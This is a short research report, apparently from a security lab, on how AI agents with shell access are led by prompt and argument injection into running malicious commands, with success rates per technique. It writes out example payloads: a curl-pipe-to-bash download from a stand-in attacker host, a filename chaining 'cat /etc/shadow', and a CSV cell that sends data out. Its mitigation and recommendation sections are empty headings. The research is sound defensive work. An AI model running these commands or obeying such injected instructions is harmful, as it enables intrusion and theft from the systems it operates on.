Research: Shell Injection Risks Through AI Agent Tool Calls

Research: Shell Injection Risks Through AI Agent Tool Calls

Abstract

Shell command execution is among the most powerful — and most dangerous — capabilities granted to AI agents. 15 Research Lab conducted a focused study on how AI agents with shell access can be manipulated into executing malicious commands through prompt injection, argument injection, and tool-call parameter manipulation. Our findings indicate that shell injection via agent tool calls represents a distinct and underappreciated threat class.

The Unique Nature of Agent-Mediated Shell Injection

Traditional shell injection targets web applications or system interfaces where user input is improperly sanitized before being passed to a shell interpreter. Agent-mediated shell injection is fundamentally different: the AI model itself constructs the shell command based on natural language instructions, meaning the injection occurs at the semantic level rather than the syntactic level.

An attacker does not need to insert shell metacharacters into an input field. Instead, they need only phrase an instruction in a way that causes the agent to generate a malicious command. This distinction is critical because it renders most traditional input sanitization approaches ineffective.

Experimental Setup

We tested 22 AI agent configurations that included shell execution tools (bash, sh, cmd, PowerShell). Each configuration was subjected to 150 adversarial prompts designed to induce harmful shell command execution. We categorized results by injection technique and impact severity.

Findings

Technique 1: Direct Instruction Injection

The most straightforward approach: instructing the agent to execute a harmful command directly. Despite safety training, 38% of tested configurations executed commands like rm -rf /tmp/* or curl attacker.com/payload.sh | bash when the instruction was framed as part of a legitimate workflow (e.g., "clean up the build directory" or "install this dependency").

Technique 2: Argument Injection via Chaining

Agents that constructed commands from user-supplied arguments were vulnerable to command chaining. Providing a filename of report.txt; cat /etc/shadow resulted in successful injection in 52% of configurations. The semicolon, pipe, and backtick operators were the most effective injection characters.

Technique 3: Environment Variable Manipulation

In 29% of configurations, agents could be induced to set or modify environment variables before executing subsequent commands. Setting PATH to include attacker-controlled directories, or modifying LD_PRELOAD, created persistent compromise that affected all subsequent shell operations.

Technique 4: Indirect Injection via File Content

When agents read file contents and incorporated them into shell commands, files containing embedded shell metacharacters triggered command execution. A CSV file with a cell containing $(curl attacker.com/exfil?data=$(whoami)) was processed and executed by 41% of tested agents.

Impact Assessment

| Injection Technique | Success Rate | Severity (CVSS Equivalent) |

|---|---|---|

| Direct Instruction | 38% | 9.1 (Critical) |

| Argument Chaining | 52% | 8.7 (High) |

| Environment Manipulation | 29% | 9.4 (Critical) |

| Indirect via File Content | 41% | 8.9 (High) |

Every successful injection resulted in arbitrary command execution with the full privileges of the agent's runtime user — which in 67% of surveyed production deployments runs as root or with elevated permissions.

Mitigation Evaluation

Recommendations

Conclusion

Shell injection through AI agents represents a critical threat that conventional web security tools are not designed to address. The semantic nature of agent-mediated injection requires controls at the agent decision layer. Organizations granting agents shell access without robust action gating should consider this a high-priority security gap.